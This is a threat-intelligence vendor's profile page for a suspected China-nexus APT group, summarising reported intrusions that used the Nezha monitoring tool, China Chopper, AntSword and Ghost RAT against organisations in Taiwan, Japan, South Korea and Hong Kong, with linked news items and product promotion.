Skip to main content
Live Webinar with SANS (June 25)— Agentic CTI Automation for Fun & ProfitRegister Free
Mallory
Back to threat actors

china_nexus_apt_group

Also known aschina_nexus_apt_group

A suspected China-nexus APT group described in reporting as underreported and capable. The group was observed using the legitimate open-source Nezha server monitoring and task management tool to retrieve detailed information from compromised systems, run commands, and maintain control of victim machines. In the reported campaign, initial compromise involved exploitation of a vulnerable public-facing web application, log poisoning to plant a China Chopper web shell, and use of AntSword as a virtual terminal to control the compromised web server. The actors then installed Nezha and used it to facilitate follow-on activity, including running PowerShell commands to disable Windows Defender and deploying Ghost RAT. Huntress identified more than 100 victim machines with the Nezha client installed. Reported victims were primarily in Taiwan, Japan, South Korea, and Hong Kong, and the activity was assessed as likely politically motivated, although Huntress did not formally attribute the campaign to a specific threat actor or determine whether the end goal was espionage or data theft. Attribution to a China nexus in the reporting is supported by the use of simplified Chinese in the administrative interface and overlap between the Ghost RAT sample used and malware previously linked to China-nexus APT groups targeting the Tibetan community. Additional reporting noted YARA detection for a backdoor loader used by a China-nexus APT group based on two distinct PDB path strings. Known associated tooling and malware mentioned in the content include Nezha, China Chopper, AntSword, Ghost RAT, and an unspecified backdoor loader.

Share:
Are they targeting you?

Know when an actor pivots toward your sector

Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.

Start free trial
ACTIVITY FEED

Recent activity

3 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

3 SOURCESView more in app
detections digest rulecheckNews
Nov 24, 2025
Detections Digest #20251124

This China-nexus APT group is known for using a specific backdoor loader, as identified by new YARA rules. The group is likely engaged in cyber espionage or targeted attacks, leveraging custom malware artifacts.

Read more
help net securityNews
Oct 9, 2025
Legit tools, illicit uses: Velociraptor, Nezha turned against victims

Using Nezha and other open-source tools for system monitoring, control, and post-compromise operations, including deploying Ghost RAT and using web shells for access.

Read more
the record mediaNews
Oct 8, 2025
China-linked hackers target Asian organizations with Nezha monitoring tool

Suspected China-based threat actors are conducting politically motivated cyber operations targeting organizations in Taiwan, Japan, South Korea, and Hong Kong. They use the Nezha monitoring tool, Ghost RAT, and AntSword to compromise and maintain access to victim systems, likely for espionage or data theft.

Read more
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: sector and geo overlap with your footprint, the IOCs they’re burning right now, detection coverage, and what to do next.
Start free trial
Target overlap

Match sector + geo + tech-stack targeting against your real footprint.

Tradecraft mapping

Every observed MITRE ATT&CK technique, grouped by tactic.

Malware arsenal

Families this actor is known to deploy, with IOCs and behavior.

Exploited CVEs

CVEs this actor has used in known campaigns.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

Observables

Domains, IPs, and hashes tied to this actor, refreshed continuously.